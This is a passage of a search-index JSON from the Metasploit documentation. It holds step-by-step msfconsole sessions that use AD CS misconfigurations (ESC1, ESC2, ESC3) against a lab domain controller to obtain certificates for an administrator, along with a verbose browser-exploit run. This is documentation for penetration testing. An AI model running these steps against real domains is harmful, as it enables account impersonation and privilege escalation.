    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#module-usage"
  },"447": {
    "doc": "Request certificates",
    "title": "Options",
    "content": "CA . The target certificate authority. The default value used by AD CS is $domain-DC-CA. CERT_TEMPLATE . The certificate template to issue, e.g. “User”. ADD_CERT_APP_POLICY . Add certificate application policy OIDs to the certificate. The ability to add policy OIDs to the certificate is dependent on its configuration. More than one OID can be specified, separated by spaces, ;, or ,. Some useful OIDs for this purpose include: . | 1.3.6.1.4.1.311.20.2.2 – Smart Card Logon | 1.3.6.1.5.2.3.4 – PKINIT Client Authentication | 1.3.6.1.5.5.7.3.1 – Server Authentication | 1.3.6.1.5.5.7.3.2 – Client Authentication | 1.3.6.1.5.5.7.3.3 – Code Signing | 1.3.6.1.4.1.311.20.2.1 – Certificate Request Agent | . ALT_DNS . Alternative DNS name to specify in the certificate. Useful in certain attack scenarios. ALT_SID . Alternative object SID to specify in the NTDS_CA_SECURITY_EXT extension. This is useful when exploiting ESC1 on a target where the KB5014754 patch has been applied. See the following resources for more information. | https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7 | https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d | . ALT_UPN . Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the format $username@$dnsDomainName. PFX . Certificate to request on behalf of. This is a PKCS12 file (using the .pfx extension), such as one generated by previously running this module. ON_BEHALF_OF . Username to request on behalf of. This is in the format $domain\\\\$username. DigestAlgorithm . This is an advanced option. The digest algorithm to use for cryptographic signing operations. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#options",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#options"
  },"448": {
    "doc": "Request certificates",
    "title": "Actions",
    "content": "REQUEST_CERT . Request a certificate. The certificate PFX file will be stored on success. The certificate file’s password is blank. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#actions",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#actions"
  },"449": {
    "doc": "Request certificates",
    "title": "Scenarios",
    "content": "Obtaining Configuration Values . For this module to work, it’s necessary to know the name of a CA and certificate template. These values can be obtained by a normal user via LDAP. msf6 > use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) > set BIND_DN [email protected] BIND_DN => [email protected] msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1! BIND_PW => Password1! msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_AD_CS_CAS ACTION => ENUM_AD_CS_CAS msf6 auxiliary(gather/ldap_query) > run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local ============================================================================================================= Name Attributes ---- ---------- cacertificatedn CN=msflab-DC-CA, DC=msflab, DC=local certificatetemplates ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA | Administrator cn msflab-DC-CA dnshostname DC.msflab.local name msflab-DC-CA [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) > . Issue A Generic Certificate . In this scenario, an authenticated user issues a certificate for themselves using the User template which is available by default. The user must know the CA name, which in this case is msflab-DC-CA. 
msf6 > use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10 RHOSTS => 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle SMBUser => aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1! SMBPass => Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA CA => msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User CERT_TEMPLATE => User msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > . Issue A Certificate With A Specific subjectAltName (AKA ESC1) . In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a different UPN effectively issues a certificate that can be used to authenticate as another user. If the target server has the KB5014754 patch applied and the REG_DWORD HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement value is set to 2, then the SID for the account with the specified UPN should be supplied as well. 
In November of 2023, Microsoft will change the default value of StrongCertificateBindingEnforcement to 2. If the server has the patch applied, the SID will be returned in the issued certificate, which ensures that the required strong mapping is in place. If the strong mapping is required and the SID is not specified in the certificate, then Kerberos authentication will fail with KDC_ERR_CERTIFICATE_MISMATCH. The user must know: . | A vulnerable certificate template, in this case ESC1-Test. | The SID of a target account, in this case S-1-5-21-3402587289-1488798532-3618296993-1000 | The UPN of a target account, in this case [email protected]. | . See the Certified Pre-Owned section on ESC1 for more information. msf6 > use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10 RHOSTS => 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle SMBUser => aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1! SMBPass => Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA CA => msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test CERT_TEMPLATE => ESC1-Test msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000 ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN [email protected] ALT_UPN => [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) > set VERBOSE true VERBOSE => true msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... 
[+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate for user aliddle - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC1-Test [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230608111432_default_192.168.159.10_windows.ad.cs_029062.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > . Issue A Certificate With The Any Purpose EKU (AKA ESC2) . In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template that either contains the Any Purpose EKU or no EKUs at all. The user must know: . | A vulnerable certificate template, in this case ESC2-Test. | A target account, in this case MSFLAB\\smcintyre. | . See the Certified Pre-Owned section on ESC2 for more information. Step 1 . The first step is to issue a certificate using the vulnerable certificate template. msf6 > use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10 RHOSTS => 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle SMBUser => aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1! SMBPass => Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA CA => msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Test CERT_TEMPLATE => ESC2-Test msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... 
[+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > . Step 2 . The second step is to run the module a second time, using the certificate issued in step 1 (passed via the PFX option) to request a certificate on behalf of the target user. The CERT_TEMPLATE option is updated to one allowing authentication, such as the default User template. msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx PFX => /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\\\smcintyre ON_BEHALF_OF => MSFLAB\\smcintyre msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User CERT_TEMPLATE => User msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\\smcintyre [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153713_default_unknown_windows.ad.cs_275853.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > . Issue A Certificate With The Certificate Request Agent EKU (AKA ESC3) . 
In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template that contains the Certificate Request Agent EKU. The user must know: . | A vulnerable certificate template, in this case ESC3-Test. | A target account, in this case MSFLAB\\smcintyre. | . The steps are identical to ESC2. First a certificate is requested using the vulnerable template. Then it is used to request another certificate on behalf of the target account. Step 1 . The first step is to issue a certificate using the vulnerable certificate template. msf6 > use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10 RHOSTS => 192.168.159.10 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle SMBUser => aliddle msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1! SMBPass => Password1! msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA CA => msflab-DC-CA msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Test CERT_TEMPLATE => ESC3-Test msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > . Step 2 . 
The second step is to run the module a second time, using the certificate issued in step 1 (passed via the PFX option) to request a certificate on behalf of the target user. The CERT_TEMPLATE option is updated to one allowing authentication, such as the default User template. msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx PFX => /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\\\smcintyre ON_BEHALF_OF => MSFLAB\\smcintyre msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User CERT_TEMPLATE => User msf6 auxiliary(admin/dcerpc/icpr_cert) > run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol [*] 192.168.159.10:445 - Binding to \\cert... [+] 192.168.159.10:445 - Bound to \\cert [*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\\smcintyre [*] 192.168.159.10:445 - Requesting a certificate... [+] 192.168.159.10:445 - The requested certificate was issued. [*] 192.168.159.10:445 - Certificate UPN: [email protected] [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154740_default_unknown_windows.ad.cs_567059.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) > . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#scenarios"
  },"450": {
    "doc": "Request certificates",
    "title": "Request certificates",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html"
  },"451": {
    "doc": "Kerberos",
    "title": "Kerberos",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/",
    "relUrl": "/docs/pentesting/active-directory/kerberos/"
  },"452": {
    "doc": "AD CS",
    "title": "AD CS",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/"
  },"453": {
    "doc": "Active Directory",
    "title": "Active Directory",
    "content": " ",
    "url": "/docs/pentesting/active-directory/",
    "relUrl": "/docs/pentesting/active-directory/"
  },"454": {
    "doc": "Pentesting",
    "title": "Pentesting",
    "content": " ",
    "url": "/docs/pentesting/",
    "relUrl": "/docs/pentesting/"
  },"455": {
    "doc": "Basics",
    "title": "Basics",
    "content": " ",
    "url": "/docs/using-metasploit/basics/",
    "relUrl": "/docs/using-metasploit/basics/"
  },"456": {
    "doc": "Getting Started",
    "title": "Getting Started",
    "content": " ",
    "url": "/docs/using-metasploit/getting-started/",
    "relUrl": "/docs/using-metasploit/getting-started/"
  },"457": {
    "doc": "Meterpreter",
    "title": "Meterpreter",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/"
  },"458": {
    "doc": "RPC",
    "title": "RPC",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/RPC/",
    "relUrl": "/docs/using-metasploit/advanced/RPC/"
  },"459": {
    "doc": "Advanced",
    "title": "Advanced",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/",
    "relUrl": "/docs/using-metasploit/advanced/"
  },"460": {
    "doc": "Oracle Support",
    "title": "Oracle Support",
    "content": " ",
    "url": "/docs/using-metasploit/other/oracle-support/",
    "relUrl": "/docs/using-metasploit/other/oracle-support/"
  },"461": {
    "doc": "Other",
    "title": "Other",
    "content": " ",
    "url": "/docs/using-metasploit/other/",
    "relUrl": "/docs/using-metasploit/other/"
  },"462": {
    "doc": "Intermediate",
    "title": "Intermediate",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/",
    "relUrl": "/docs/using-metasploit/intermediate/"
  },"463": {
    "doc": "Using Metasploit",
    "title": "Using Metasploit",
    "content": " ",
    "url": "/docs/using-metasploit/",
    "relUrl": "/docs/using-metasploit/"
  },"464": {
    "doc": "Module metadata",
    "title": "Module metadata",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/",
    "relUrl": "/docs/development/developing-modules/module-metadata/"
  },"465": {
    "doc": "Scanners",
    "title": "Scanners",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/scanners/",
    "relUrl": "/docs/development/developing-modules/guides/scanners/"
  },"466": {
    "doc": "Guides",
    "title": "Guides",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/",
    "relUrl": "/docs/development/developing-modules/guides/"
  },"467": {
    "doc": "Compiling C",
    "title": "Compiling C",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/",
    "relUrl": "/docs/development/developing-modules/libraries/c/"
  },"468": {
    "doc": "HTTP",
    "title": "HTTP",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/http/",
    "relUrl": "/docs/development/developing-modules/libraries/http/"
  },"469": {
    "doc": "Deserialization",
    "title": "Deserialization",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/deserialization/",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/"
  },"470": {
    "doc": "Obfuscation",
    "title": "Obfuscation",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/"
  },"471": {
    "doc": "SMB Library",
    "title": "SMB Library",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/smb_library/",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/"
  },"472": {
    "doc": "Libraries",
    "title": "Libraries",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/",
    "relUrl": "/docs/development/developing-modules/libraries/"
  },"473": {
    "doc": "External Modules",
    "title": "External Modules",
    "content": " ",
    "url": "/docs/development/developing-modules/external-modules/",
    "relUrl": "/docs/development/developing-modules/external-modules/"
  },"474": {
    "doc": "Developing Modules",
    "title": "Developing Modules",
    "content": " ",
    "url": "/docs/development/developing-modules/",
    "relUrl": "/docs/development/developing-modules/"
  },"475": {
    "doc": "Roadmap",
    "title": "Roadmap",
    "content": " ",
    "url": "/docs/development/roadmap/",
    "relUrl": "/docs/development/roadmap/"
  },"476": {
    "doc": "Quality",
    "title": "Quality",
    "content": " ",
    "url": "/docs/development/quality/",
    "relUrl": "/docs/development/quality/"
  },"477": {
    "doc": "Git",
    "title": "Git",
    "content": " ",
    "url": "/docs/development/get-started/git/",
    "relUrl": "/docs/development/get-started/git/"
  },"478": {
    "doc": "Get Started",
    "title": "Get Started",
    "content": " ",
    "url": "/docs/development/get-started/",
    "relUrl": "/docs/development/get-started/"
  },"479": {
    "doc": "Proposals",
    "title": "Proposals",
    "content": " ",
    "url": "/docs/development/propsals/",
    "relUrl": "/docs/development/propsals/"
  },"480": {
    "doc": "Process",
    "title": "Process",
    "content": " ",
    "url": "/docs/development/maintainers/process/",
    "relUrl": "/docs/development/maintainers/process/"
  },"481": {
    "doc": "Ruby Gems",
    "title": "Ruby Gems",
    "content": " ",
    "url": "/docs/development/maintainers/ruby-gems/",
    "relUrl": "/docs/development/maintainers/ruby-gems/"
  },"482": {
    "doc": "Maintainers",
    "title": "Maintainers",
    "content": " ",
    "url": "/docs/development/maintainers/",
    "relUrl": "/docs/development/maintainers/"
  },"483": {
    "doc": "Google Summer of Code",
    "title": "Google Summer of Code",
    "content": " ",
    "url": "/docs/development/google-summer-of-code/",
    "relUrl": "/docs/development/google-summer-of-code/"
  },"484": {
    "doc": "Development",
    "title": "Development",
    "content": " ",
    "url": "/docs/development/",
    "relUrl": "/docs/development/"
  },"485": {
    "doc": "Home",
    "title": "Getting Started",
    "content": ". | Setting Up a Metasploit Development Environment | Using Metasploit | Using Git | Reporting a Bug | Navigating and Understanding Metasploit’s Codebase | . ",
    "url": "/#getting-started",
    "relUrl": "/#getting-started"
  },"486": {
    "doc": "Home",
    "title": "Contributing",
    "content": ". | Contributing to Metasploit | Creating Metasploit Framework LoginScanners | Guidelines for Accepting Modules and Enhancements | Common Metasploit Module Coding Mistakes | Style Tips | Committer Rights | Landing Pull Requests | . ",
    "url": "/#contributing",
    "relUrl": "/#contributing"
  },"487": {
    "doc": "Home",
    "title": "Metasploit Development",
    "content": ". | Style Tips | Get Started Writing an Exploit | How to get started with writing an auxiliary module | How to get started with writing a post module | How to get started with writing a Meterpreter script | Running Private Modules | Exploit Ranking | Module Reference Identifiers | How to check Microsoft patch levels for your exploit | How to deprecate a Metasploit module | How to do reporting or store data in module development | How to log in Metasploit | How to obfuscate JavaScript in Metasploit | How to parse an HTTP response | How to Send an HTTP Request Using HTTPClient | How to send an HTTP request using Rex Proto Http Client | How to use command stagers | How to use datastore options | How to use Msf Auxiliary AuthBrute to write a bruteforcer | How to use PhpEXE to exploit an arbitrary file upload bug | How to use Powershell in an exploit | How to use Railgun for Windows post exploitation | How to Use the FILEFORMAT mixin to create a file format exploit | How to use the Msf Exploit Remote Tcp mixin | How to use the Seh mixin to exploit an exception handler | How to use WbemExec for a write privilege attack on Windows | How to write a browser exploit using BrowserExploitServer | How to write a browser exploit using HttpServer | How to write a check method | How to write a HTTP LoginScanner Module | How to write a module using HttpServer and HttpClient | How to zip files with Msf::Util::EXE.to_zip | How to use Metasploit Framework Compiler Windows to compile C code | How to use Metasploit Framework Obfuscation CRandomizer | How to decrypt RC4 with Metasploit Framework Compiler | How to decode Base64 with Metasploit Framework Compiler | How to XOR with Metasploit Framework Compiler | Using ReflectiveDll Injection | Oracle Usage | Definition of Module Reliability, Side Effects, and Stability | How to cleanup after module execution | . ",
    "url": "/#metasploit-development",
    "relUrl": "/#metasploit-development"
  },"488": {
    "doc": "Home",
    "title": "Metasploit Payloads",
    "content": ". | How Payloads Work | Merging Metasploit Payload Gem Updates | Meterpreter Configuration | Meterpreter HTTP Communication | Meterpreter Paranoid Mode | Meterpreter Reliable Network Communication | Meterpreter Sleep Control | Meterpreter Stageless Mode | Meterpreter Timeout Control | Meterpreter Transport Control | Meterpreter Unicode Support | Payload UUID | Python Extension | The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers | . ",
    "url": "/#metasploit-payloads",
    "relUrl": "/#metasploit-payloads"
  },"489": {
    "doc": "Home",
    "title": "Other Metasploit Resources",
    "content": ". | Metasploit 5.0 Release Notes | Downloads by Version | Evading Anti Virus | How to use a Metasploit module appropriately | How to use a reverse shell in Metasploit | Information About Unmet Browser Exploit Requirements | How to use msfvenom | What my Rex Proto SMB Error means | Why CVE Is Not Available | . ",
    "url": "/#other-metasploit-resources",
    "relUrl": "/#other-metasploit-resources"
  },"490": {
    "doc": "Home",
    "title": "GitHub Resources",
    "content": ". | Git Cheatsheet | Git Reference Sites | Remote Branch Pruning | . ",
    "url": "/#github-resources",
    "relUrl": "/#github-resources"
  },"491": {
    "doc": "Home",
    "title": "Home",
    "content": "Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to download the Metasploit nightly installers. This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro. If you’re using Kali Linux, Metasploit is already pre-installed. See the Kali documentation for how to get started using Metasploit in Kali Linux. Are you anxious to get your Metasploit Development Environment set up so you can start Landing Pull Requests and contributing excellent exploit code? If so, you’re in the right place. If you’re an exploit developer, you will want to review our Guidelines for Accepting Modules and Enhancements to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for contributing to Metasploit, and dive into Setting Up a Metasploit Development Environment. ",
    "url": "/",
    "relUrl": "/"
  },"492": {
    "doc": "Information About Unmet Browser Exploit Requirements",
    "title": "Information About Unmet Browser Exploit Requirements",
    "content": "So I see your browser exploit has refused to attack due to some kind of unmet requirements. Typically this means one of the following: . | Your target doesn’t have the right conditions to be exploited. | Your target isn’t vulnerable at all. | . The exploit should say what requirements are not met. The requirements are explained here: . | Key | Description | . | :source | Target has JavaScript disabled. | . | :ua_name | Target isn’t using the preferred browser. For example: Firefox, IE. | . | :ua_ver | Target isn’t using the preferred browser version. | . | :os_name | Target isn’t using the preferred operating system. | . | :os_flavor | This has been deprecated. If you see this, your Metasploit is most likely out of date. | . | :language | Target isn’t using the preferred OS language. | . | :arch | Target isn’t on the preferred architecture. For example: x86/x64 | . | :proxy | Target has a proxy. | . | :silverlight | Target doesn’t have Silverlight installed. | . | :office | Target doesn’t have the preferred version of Microsoft Office installed, so the exploit cannot bypass DEP. | . | :java | Target doesn’t have the preferred version of Java. Often this is used by exploits to bypass DEP. | . | :clsid | Target doesn’t have the preferred ActiveX control. If this is the problem, you will only see a mismatch with :activex instead of :clsid. | . | :method | Target doesn’t have the preferred ActiveX control. If this is the problem, you will only see a mismatch with :activex instead of :method. | . | :mshtml_build | Target isn’t on the preferred build of Internet Explorer. Usually means only specific builds of IE are vulnerable. | . | :flash | Target isn’t using the preferred version of Adobe Flash. Often this is used by exploits to leverage code execution. | . | :vuln_test | A custom JavaScript-based check. There should be a custom vuln_test_error message explaining why on msfconsole. | . How to manually check requirement comparisons: . 
If you’d like to check the comparisons, simply set VERBOSE to true. The following is an example: . msf exploit(ms13_022_silverlight_script_object) > set VERBOSE true VERBOSE => true msf exploit(ms13_022_silverlight_script_object) > run [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.64:4444 [*] Using URL: http://0.0.0.0:8080/SHIzaS2aZxIA6 msf exploit(ms13_022_silverlight_script_object) > [*] Local IP: http://192.168.1.64:8080/SHIzaS2aZxIA6 [*] Server started. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received cookie 'sVfdquJGHzpHyLItxoTgeJI'. [*] 192.168.1.80 ms13_022_silverlight_script_object - Gathering target information. [*] 192.168.1.80 ms13_022_silverlight_script_object - Sending response HTML. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Info receiver page called. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received cookie 'ZnKtXOQIvxAclSrEOxJ'. [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received sniffed browser data over POST: {\"os_name\"=>[\"Microsoft Windows\"], \"os_flavor\"=>[\"XP\"], \"ua_name\"=>[\"MSIE\"], \"ua_ver\"=>[\"8.0\"], \"arch\"=>[\"x86\"], \"java\"=>[\"null\"], \"silverlight\"=>[\"false\"], \"flash\"=>[\"null\"], \"office\"=>[\"null\"], \"mshtml_build\"=>[\"18702\"]}. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received cookie 'ZnKtXOQIvxAclSrEOxJ'. 
[*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Serving exploit to user with tag ZnKtXOQIvxAclSrEOxJ [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Setting target \"ZnKtXOQIvxAclSrEOxJ\" to :tried. [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: source=(?i-mx:script|headers) vs k=script [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: ua_name=MSIE vs k=MSIE [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: silverlight=true vs k=false [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: arch=x86 vs k=x86 [!] 192.168.1.80 ms13_022_silverlight_script_object - Exploit requirement(s) not met: silverlight . Related Reading: . | How to write a browser exploit using BrowserExploitServer | . ",
    "url": "/docs/using-metasploit/other/information-about-unmet-browser-exploit-requirements.html",
    "relUrl": "/docs/using-metasploit/other/information-about-unmet-browser-exploit-requirements.html"
  },"493": {
    "doc": "Inspecting tickets",
    "title": "Inspecting Kerberos Tickets",
    "content": "The auxiliary/admin/kerberos/inspect_ticket module allows you to print the contents of a ccache/kirbi file. The module will output ticket information such as: . | Client information | Service information | Ticket creation / expiry times | Decrypted ticket contents - if NTHASH or AESKEY is set | . ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#inspecting-kerberos-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#inspecting-kerberos-tickets"
  },"494": {
    "doc": "Inspecting tickets",
    "title": "Acquiring tickets",
